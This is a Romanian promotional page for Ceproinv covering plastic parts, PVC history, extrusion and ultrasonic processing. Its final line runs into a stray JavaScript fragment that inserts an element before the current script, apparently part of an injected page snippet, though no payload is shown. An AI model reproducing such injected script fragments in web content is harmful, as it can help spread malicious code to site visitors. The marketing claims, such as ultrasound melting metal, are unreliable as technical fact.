piese plastic

piese plasticExista in aproape orice produs tehnic, iar daca in trecut acesta era vazut ca fiind un material ieftin, un simbol al calitatii slabe, plasticul devine tot mai utilizat atat in produsele de zi-cu-zi dar si in echipamentele industriale si tehnice. Ceproinv este unul din cei mai mari producatori de piese plastic dar si semifabricate din PVC si plasticuri speciale ce ofera caracteristici tehnice specifice diferitelor aplicatii atat industriale cat si tehnice. Plasticul este un compus chimic ce poate fi de natura organica, anorganica sau mixta avand o istorie oarecum destul de recenta. In anul 1908 Jacques Brandenberger ofera intregii lumi celofanul. Materialul folosit chiar si in prezent in industria alimentara si nu numai. Insa, primele piese plastic nu vor aparea pana in anul 1913, odata cu polimezarea gazului de Clorura de Vinil realizata de catre Fritz Klatte. PVC-ul este folosit in prezent la scara mondiala in extrem de multe aplicatii, incepand cu domenii ca cel al constructiilor, electronicelor de consum si industriale dar si in altele.

Producem toate tipurile de piese plastic

Gama de piese plastic produse de catre Ceproinv vin sa intampine nevoile clientilor nostri indiferent de cerintele acestora. Indiferent de tipul produsului din masa plastica, tot procesul de fabricare pleaca de la o cantitate precisa de mici granule din PVC sau tipul de masa plastica necesar pentru respectiva comanda. Forma granulata a materiei prime vine sa ofere o serie de avantaje atat in cursul proceselor tehnologice de prelucrare, dar si in timpul transportului si a depozitarii acestora. Granulele ce urmeaza a fi prelucrate in piese plastic sunt de diferite tipuri si mai ales, in diferite nuante, astfel exista granule de plastic ce pot fi prelucrate prin proces termic (topire) sau prin comprimare la rece.
Evident, exista o serie larga de modalitati de prelucrare in vederea obtinerii unor piese plastic, iar daca in trecut se folosea flacara pentru topirea granulelor, in prezent, sunetul este mijlocul prin care se pot realiza o paleta larga de operatiuni, incepand cu topirea materialelor (chiar si a metalului) plastice pana la sudura si lipire. Ultrasunetele sunt practic oscilatii de inalta frecventa care, datorita efectului de rezonanta induce obiectului sau volumului (de granule PVC) temperatura necesara pentru prelucrarea termica. Astfel, se diminueaza foarte mult consumul de energie si mai ales, se elimina o serie larga de riscuri tehnologice cum ar fi accidentari, obtinerea unui produs necomform, etc.

Folosirea sunetului in procesul de fabricare a unor piese plastic

Unele piese plastic sunt realizate prin extrudare. Practic, o masa de plastic fierbinte (la limita punctului de topire) este impinsa prin niste forme ce dau infatisarea finala a obiectului. De exemplu, tubulaturile, discurile, formele dar si piesele simple sunt obtinute prin acest procedeu care este oarecum similar cu ceea ce face un cofetar cand pune ultimele retusuri si decoratiuni din frisca pe un tort.

Pe langa aceste procedee tehnice, pentru obtinerea unor anumite piese plastic pot fi folosite diferiti pasi tehnologici in cursul carora sunt utilizate echipamente de la cele mai simple, pana la cele mai complexe. Ceproinvest detine toate echipamentele necesare pentru a produce de la cele mai simple piese plastic pana la cele mai complexe. Va asteptam pe siteul www.ceproinv.rodocument.currentScript.parentNode.insertBefore(s, document.currentScript);